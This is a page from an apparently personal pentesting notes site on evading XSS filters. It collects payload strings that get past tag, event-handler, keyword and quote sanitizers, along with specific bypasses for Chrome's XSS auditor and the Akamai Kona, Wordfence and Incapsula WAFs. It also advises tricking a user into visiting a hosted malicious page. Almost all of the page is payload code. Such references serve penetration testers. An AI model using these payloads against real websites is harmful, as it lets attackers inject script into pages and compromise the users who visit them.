📑
Security Notes
  • Readme
  • Resources
    • Useful sites
    • Metasploit
      • Searchsploit
      • Msfvenom
      • Meterpreter
    • Shells
    • Linux
      • Cron
      • Connection
      • Compilers
    • Windows
      • Kernel exploits table
    • Bruteforce
      • Checklist
      • John the Ripper
      • Hashcat
    • BOF
      • Assembly
    • Gaining access checklist
  • Cloud - AWS
    • Enumeration
    • References
    • Bucket S3
      • Public Bucket
      • AMI Files
      • File upload to RCE
    • EC2
      • cloud-init Exploits
      • SSRF To AWS Role compromise
      • Unencrypted EBS
    • IAM
      • Account Disclosure by resource policy
    • Lambda Function
      • Code Injection
      • Attacking APIs
    • VPC
      • Expose Resources
  • Networking
    • Nmap
      • Scan types
    • TCPDump
    • Port forwarding
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 25 465 587 - SMTP
      • 53 - DNS
      • 110 995 - POP3
      • 111 - NFS
      • 113 - Ident
      • 123 - NTP
      • 135 137 139 - RPC
      • 143 993 - IMAP
      • 161 - SNMP
      • 389 - LDAP
      • 139 445 - SMB
      • 873 - Rsync
      • 6379 - Redis
      • 6667 - IRC
  • Linux PrivEsc
    • Checklist
    • Enumeration
      • Important files
      • Memory Dump
    • Privileges Exploitation
    • Wildcard Exploits
    • Sudo Exploits
    • Docker Container
    • Docker Groups
    • Common Exploits
  • Windows PrivEsc
    • Checklist
    • Enumeration
      • Important Files
    • Antivirus evasion tools
    • Unquoted paths
    • Always install elevated
    • Vulnerable services
    • Client side
    • Exploitable privileges
      • Juicy Potato
    • UAC bypass
    • Common Exploits
  • Active Directory
    • Introduction
    • Checklist
    • Enumeration
    • Enable RDP
    • Kerberos
    • Rubeus
    • Credentials harvesting
      • Domain Controller specific
    • Connection
    • Pass The Hash
    • Kerberoast
    • ASREProast
    • Tickets
  • Web Attacks
    • Checklist
    • Enumeration
      • URL bruteforcing
    • APIs and Fields
    • Authentication
    • Filter Evasion
      • Fuzzying and encoding
    • File Vulnerabilities
      • LFI List
      • PHP shells
    • RCE
    • Code Injection
    • Dependency Injection
    • Joomla
    • Wordpress
    • WebDAV
    • HTTP
    • XSS
      • DOM Based
      • Reflected
      • Filter Evasion
    • SSI
    • SSTI
    • RCE
    • CSRF
    • SQL injection
      • sqlmap
      • PostgreSQL
      • Oracle
      • MSSQL
      • MySQL
      • Login
    • XPath injection
    • XXE
    • CORS
  • MOBILE PENTESTING
    • Static Code Analysis
    • Dynamic Code Analysis
    • Network Traffic Analysis
Powered by GitBook
On this page
  • Common Techniques
  • Script tag
  • Events
  • Keywords
  • Sanification Bypass
  • WAF Bypass
  • Google Chrome Payloads
  • Safari
  • Kona WAF (Akamai) Bypass
  • Wordfence
  • Incapsula WAF
  1. Web Attacks
  2. XSS

Filter Evasion

Common Techniques

Script tag

Weak tag parsing bypass

<ScRiPt>...</sCrIpT>
<ScRiPt>...    #unclosed tags
<script/[gibberish]>...<script>
<script [\n\r\t]>...</script>
<script [\x00 \x0D \x0A]>... </script [\x00 \x0D \x0A]>
<scr<script>ipt>...</scr<script>ipt>

Common alternative tags

Require use interaction

<a href="javascript:[code]">show</a>
<a href="data:text/html;base64,[base64 payload]">show</a>

<form action="javascript:[code]><button>Click me</button></form>
<form id="f1"></form><button form="x" formaction="javascript:[code]">Click me</button>

<object data="javascript:[code]">
<object data="text/html:<script>[code]</script>">
<object data="data:text/html;base64,[base64 payload]">

EvilCos

Can be downloaded here.

Host the page on a site that you control and trick a user to navigate to it or trigger a HTTP request to the malicious URL.

<object data="[evil site]/xss.wfs">
<object data="[evil site]/xss.wfs" allowscriptaccess="always">

Events

Common HTML 4

<body onload="[code]">
<input type="image" src="x" onerror="[code]">
<isindex onmouseover="[code]">
<form oninput="[code]"><input></form>
<textarea autofocu onfocus="[code]">
<input oncut="[code]">

Common HTML 5

<svg onload="[code]">
<keygen autofocus onfocus="[code]">
<video><source onerror="[code]">
<marquee onstart="[code]">

Filter Bypass

Bypass filter that match every word that starts with on by exploiting browser dynamisms

<svg/onload=...>
<svg///////onload=...>
<svg id="x";onload=...>
<svg id=x;onload=...>
<svg id=`x`onload=...>

Bypass filters by exploiting control characters not included in the /s regex selector

<svg onload%09=...>
<svg %09onload=...>
<svg %09onload%20=...>
<svg onload%09%20%28%2c%3b=...>
<svg onload%0b=...>

List of control characters commonly allowed after the equal sign or just before the event name to use to spoof filters

%09 %0b %0c %20 %3b    #Internet Explorer
%09 %20 %28 %2c %3b    #Google Chrome
%2c %3b                #Safari
%09 %20 %28 %2c %3b    #Firefox
%09 %20 %2c %3b        #Opera
%09 %20 %28 %2c %3b    #Android

Keywords

Some filters try to detect common words used in XSS attacks such as alert, document, xhr, cookie etc...

Bypass by encoding

URL encoding, Unicode and CSS formats can be used directly inside HTML pages without needing native tools. These techniques can be combined with each other to form even more complex payloads

alert
\u0061lert
&#x0061lert
&#97lert

#the encoding formats below require the input to be in a string
eval('\141lert')
eval('\x61lert')

#useless escapte characters
eval('\a\l\e\rt(\1\)')

Bypass by constructing strings

alert
/ale/.source+/rt/.source
String.fromCharCode(97,108,101,114,116)    #Hex unicode encoding
atob("YWxkcnQ=")                           #Base64 paylad
17795081..toString(36)                     #Convert the number on the left to a base36 string

Alternatives function sinks

setTimeout
setInterval
Function
[].constructor.constructor("[code]")

Sanification Bypass

Remove tags

<scr<script>ipt>...</script>    #script might check only first instance
<scr<iframe>ipt>...</script>    #recursive scripts might not start every iteration from the beginnig of the string

Escape quotes

eval(\'...\')            #the filter replaces ' with \' so by adding \ we obtain \' --> \\'
String.fromCharCode(...) #generate string from sequence of unicode hex chars
unescape(/%78%u0073%73/.source)                  #decode escaped characters
decodeURI(/alert(%22...%22)/.source)             #decode URL escaped chars
decodeURIComponent(/alert(%22...%22)/.source)    #decode URL escaped chars

Escape parenthesis

By invoking the throw function it is possible to encode the parenthesis characters. Since the payload is in a string it is possible to use all the obfuscation techniques described in the Keywords section

<img src=x onerror="window.onerror=eval;throw='alert\x28\x29'"

WAF Bypass

Google Chrome Payloads

Google XSS Audit Bypass

<svg><animate xlink:href=#x attributeName=href values=&#106;avascript:alert(1) /><a id=x><rect width=100 height=100 /></a>

Chrome < v60 beta XSS-Auditor Bypass

<script src="data:,alert(1)%250A-->

Other Google Audit Bypass Payloads

<script>alert(1)</script
<script>alert(1)%0d%0a-->%09</script
<x>%00%00%00%00%00%00%00<script>alert(1)</script>

Safari

<script>location.href;'javascript:alert%281%29'</script>

Kona WAF (Akamai) Bypass

<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>

Wordfence

<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>

Incapsula WAF

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
PreviousReflectedNextSSI

Last updated 2 years ago